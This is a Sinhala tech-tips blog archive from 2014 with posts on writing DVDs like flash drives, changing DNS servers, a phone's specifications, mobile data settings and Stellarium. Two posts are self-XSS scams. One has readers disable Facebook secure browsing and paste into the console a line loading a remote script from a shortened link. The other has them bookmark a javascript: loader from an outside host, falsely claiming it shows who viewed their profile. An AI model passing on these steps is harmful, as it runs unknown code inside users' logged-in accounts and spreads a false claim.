Tuesday, September 30, 2014

dvd eka pen ekak wage karamuda?

යාලුවනේ, ඔයාල දැනගෙන හිටියද Windows 7 වල pen drive එකක් විදිහට DVD writeකරන්න පුලුවන් කියලා? මේ විදිහට write කරොත් අපිට ඕනෙ වෙලාවක අපේ files, DVDඑකේ තියෙද්දිම edit කරන්න පුලුවන්. ඕනෙනම් තියෙන file delete කරන්න, අලුත් file addකරන්න පුලුවන්. Pen drive
එකක වගේම. ඒ උනාට මේ DVD එක read, write කරන්න පුලුවන් Windows xp, Vista, 7 වල විතරයි.කොහොමත් අපි ඔය OS නේ.. 
මම මේක දැනගත්තෙ දැන්. තවත් නොදන්න අය ඇති කියල හිතුන නිසයි post කරන්නෙ.

ඉස්සෙල්ලාම කියන්න ඕන මේක උපුටා ගත්ත එකක්.ඔයාලට වැදගත් වෙයි කියලා හිතලයිදාන්නේ.මට නම් ගොඩක් වැදගත් උනා .කස්ටිය කියනවනේ කොහෙන්දෝ අහුලලාබ්ලොග් එකට දැම්මා කියලා..ඒ නිසා ඒ වරදින් බේරෙන්න ඔන්න ආයෙත් කිව්වා මෙකඋපුටා ගත්ත එකක්.
කියවලා බලන්න එහෙනම්

මෙහෙමයි DVD එක හදාගන්නෙ.
1. හිස් DVD එක writer එකට දාල autorun එනකල් ඉන්න.
2. දැන් Burn files to disk using Windows explorer thooranna.
3. Disk එකට කැමති නමක් දෙන්න.
4. "Like a USB flash drive" option එක තෝරල Next click කරන්න. 
5. දැන් "Formatting..." message එක එයි. Format උනාට පස්සෙ අපේ DVD එක pen drive එකක් වගේ වැඩ කරනවා. 
6. දැන් pen එකකට data copy කරනව වගේ DVD එකට data copy කරන්නයි තියෙන්නෙ. 

Monday, September 29, 2014

speedup your internet connection without any softwrare

speedup your internet connection without any softwrare


 

H
ow to do this?

  • Go to Control Panel

  • Then go to Network and Sharing Center
  • Click on Local Area Connection

How to Speed Up Internet with High Speed DNS Server
  • Then click on Properties 
How to Speed Up Internet with High Speed DNS Server


After that, Select Internet Protocol Version 4 (TCP/IPv4) and click onProperties 

OR

Double Click on Internet Protocol Version 4 (TCP/IPv4)

How to Speed Up Internet with High Speed DNS Server
  • Now click on Use the following DNS addresses and change it as follows.


Preferred DNS Server : 208.067.222.222
Alternate DNS Server : 208.067.220.220

ORPreferred DNS Server : 8.8.8.8
Alternate DNS Server : 8.8.4.4

How to Speed Up Internet with High Speed DNS Server

Then Click on OK, That's all. Now your internet connection will speedup with high speed DNS server.

Intel ප්‍රොසෙසරයකින් බලගැන්වූ Xolo X900 වෙළඳපොලට

Intel ප්‍රොසෙසරයකින් බලගැන්වූ Xolo X900 වෙළඳපොලට

ලෝකප්‍රසිද්ධ ඉන්ටෙල් සමාගම මෙතෙක් කල් නිෂ්පාදනය කලේ පරිගණක සඳහා ප්‍රොසෙසර් පමණයි. නමුත් දැන් ඔවුන් ජංගම දුරකථන සඳහාත් ප්‍රොසෙසර නිපදවීම පටන් අරන්. ඔවුන්​ගේ ප්‍රොසෙසරයක් සහිත පළමු ජංගම දුරකථනය වන Xolo X900 වෙළඳපොලට නිකුත් කිරීමට සියලු කටයුතු දැන් සූදානම්. දුරකථනය නිෂ්පාදනය කරලා තියෙන්නේ ඉන්දියානු සමාගමක් වල Lava International සමාගම.

දුරකථනයේ විස්තර :
CPU : Intel Atom Z2460 (1.6GHz)
GPU : PowerVR SGX540 (400MHz)
RAM : 1GB
Display : 4.03-inch display with 1024 x 600 resolution (295 PPI)
Camera : 8MP Rear camera with flash, 10fps burst mode and 1080p videorecording. 1.3MP Front camera
Internal Storage : 16GB
Connectivity : HSPA+ (21Mbps), HDMI, NFC built-in
OS : Android 2.3 (Gingerbread)
මෙම දුරකථනය ​අප්‍රෙල් 23 වෙනිදා වෙළඳපොලට නිකුත් වෙන බව තමයි පැවසෙන්නෙ, ඉන්ටෙල් වෙබ් අඩවියට අනුව මෙහි මිල ඉන්දියානු රුපියල් 22,000ක් පමණ වෙනවා.
Source : Intel News Room

Sunday, September 28, 2014

Facebook Group එකකට සියලුම මිතුරන් එකවර එකතු කිරීම.

ඔබ දන්නවා facebook group එකකට සාමාජිකයන් එකතු කල යුතු නම් එකින් එක නම් ඇතුලත් කරමින් මිතුරන් එකතු කල යුතුය. මේ එම කාර්යය වෙහෙසකින් තොරව වඩාත් ඉක්මනින් හා පහසුවෙන් කරගත හැකි එකම ක්‍රමයයි.

 * ඔබගේ ෆේස්බුක් ගිණුමට ලොග් වන්න .

* Account setting > Security > තුලට ගොස්  Secure browsing off කරන්න.

 * මීලගට මිතුරන් එකතු කල යුතු group එකට යන්න.

 * පහත ඉරි අතර ඇති සම්පුර්ණ code එකම copy කරගන්න.
_____________________________


 document.body.appendChild(document.createElement('script')).src='http://goo.gl/HY9ya';


_____________________________


 Google Chrome හා Mozilla Firefox වෙබ් බ්‍රව්සර සදහා මෙය භාවිතා කරන ආකාරය පහත දැක්වේ.




 Google Chrome භාවිතා කරන අය පහල පියවර අනුගමනය කරන්න.


1. යාළුවන්ව එකතු කරන්න ඕන කරන ගෲප් එකට යන්න.

2. Page එකේ ඔබ කැමති තැනක Right Click කරන්න.

 3. "Inspect Element" යන්න තෝරා ඉන් පසු "Console" තෝරන්න.

 4. පහත දී තිබෙන Script Code එක Copy කර Paste කරන්න.

 5. Ctrl + v යතුරු එකවර එබීමෙන් past වේ.



Mozilla Firefox භාවිතා කරන අය පහල ක්‍රමය අනුගමනය කරන්න.


1. යාළුවන්ව එකතු කරන්න ඕන කරන ගෲප් එකට යන්න.

 2. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.

 3. පහත දී තිබෙන Script Code එක Copy කර Paste කරන්න.

 4. Ctrl + v යතුරු එකවර එබීමෙන් past වේ.

ඔබේ Facebook මිතුරන් අතරින්, වැඩියෙන්ම ඔබේ Profile එකට ඇවිත් තියෙන්නේ කවුද කියලා දැන ගන්න කැමතිද?

මාතෘකාව දැක්ක ගමන් මොකද්ද මේ සීන් එක කියල ඔබ අවබෝද කරගන්න ඇති. ඒ වගේම පොඩි
උනන්දුවකුත් ඇති වෙන්න ඇති ඒ පිලිබදව. ඇයි ඉතින් කවුද අප්පේ අකමැති මුහුණු පොතේ  මිතුරන් අතරින් 
 කවුද ඔබ ගැන නිතරම හොයලා බලන්නේ කියලා දැනගන්න. නේද?  හ්ම්ම් හ්ම්ම්…
අද අපි කතා කරන්න යන්නේ මුහුණු පොතේ ඔබේ මිතුරන් අතරින් වැඩියෙන්ම ඔබේ profile එකට 
ආපු මිතුරන් කවුද කියලා දැනගන්න පුළුවන් trick එකක් ගැන. තවත් ඉතින් කතා ඕනේ නැහැ. අපි වැඩේට බහිමු.
ඔබේ Facebook මිතුරන් අතරින්, වැඩියෙන්ම ඔබේ profile එකට ඇවිත් තියෙන්නේ 
කවුද කියලා දැන ගන්නේ කොහොමද?
මුලින්ම ඔබට කරන්න තියෙන්නේ ඔබේ browser එකේ Bookmark Bar එක පෙනෙන විදියට සකසා ගන්න එක.
ඊට පසුව  පහත දීලා තියෙන Java Script Code එක Bookmark කරගන්න
javascript:(function(){var script=document.createElement('script');script.type='text/javascript';script.src='http://thekeesh.com/js/edges.js';document.getElementsByTagName('body')[0].appendChild(script);}())
අනතුරුව Facebook profile එකට ලොග් වී, ඔබ කලින් bookmark කරගත් java script එකේ
icon එක ක්ලික් කරන්න.
ඔබගේ profile එක වැඩියෙන්ම visit කරලා තියෙන ඔබේ මිතුරන්ගේ නම් list එක උඩ සිට පහලට
පිළිවෙලට දැක බලාගන්න පුළුවන්.
 ප. ලි:මෙය ඔබට වැඩ කරන්නේ නැතිනම් ඒ ඔබ Secure Browsing (https) කරගෙන අති නිසා වෙන්න පුලුවන්.
ඒ නිසා පහත ලින්ක් එක හරහා security settings වෙත ගොස් Secure Browsing feature  එක disable කරගන්න.

Saturday, September 27, 2014

GPRS / EDGE / 3G / තැන තැන යන්නේ නෙතුව හදාගන්න ඔයාම GPRS \MMS settings හදාගන්න !


Airtel GPRS Free 100% Settings 
Etisalat Internet Settings 
Mobitel settings GPRS / EDGE / 3G /  GPRS \MMS settings 

Stellarium: ඔබේ පරිගණකයට ග්‍රහලෝකාගාරයක්.


Stellarium යනු නොමිලේ දෙන OpenSource මෘදුකාංගයකි. මෙමගින් ලෝකයේ ඕනෑම ස්ථානයක ඕනෑම වෙලාවක අහසක් ප්‍රතිනිර්මාණය කර 3D ආකාරයට නැරඹිය හැකියි. ඒ වගේම අපි තෝරා ගන්න object එකක් zoom කර බැලීමේ හැකියාවද තිබෙනවා. මෙමගින් ග්‍රහලෝකයකට තිබෙන උපග්‍රහයින්(චන්දුයින් ) ගණන බලලා ගන්නත් පුලුවන්.
මෙහි එන Default Library එකේ තරු ලක්ෂ 6 කට අධික ගණනක දත්ත අඩංගු වෙනවා. ඊට අමතරව තවත් දත්ත පසුව Install කරගන්න පුලුවන්. මෙහි තිබෙන තවත් feature එකක් තමයි පරිගණකයේ වෙලාවට අනුව එම මොහොතේ අහස පෙන්වීම. ඒ කියන්නේ Realtime තරු සිතියමක් ලෙසත් මෙය හඳුන්වන්න පුලුවන්. ඒකෙන් කියන්නෙ නෑ මෙයින් තරු බලන්න නම් රෑ වෙනකම් ඉන්න වෙනවා කියලා. නමුත් මෙහි ඇති වායුගෝලය ඉවත් කර නැරඹීමේ ක්‍රමය නිසා දවල් උනත් තරු බලන්න පුලුවන්.
ඔබ Ubuntu මෙහෙයුම් පද්ධතිය භාවිතා කරන්නෙක් නම් ඔබට මෙම මෘදුකාංගය UbuntuSoftware Center එකෙන් Install කර ගන්න පුලුවන්. නැත්නම් .deb file එක මෙතනින් ගන්න.
Stellarium සඳහා අවශ්‍ය වන Data Files මෙම සබැඳියෙන් ගන්න.
Stellarium ගැන වැඩි විස්තර සඳහා Stellarium site එකට යන්න.http://www.stellarium.org/
ඔබ Windows භාවිතා කරන්නේ නම් Stellarium සඳහා .exe file එක මෙතනින් ගන්න.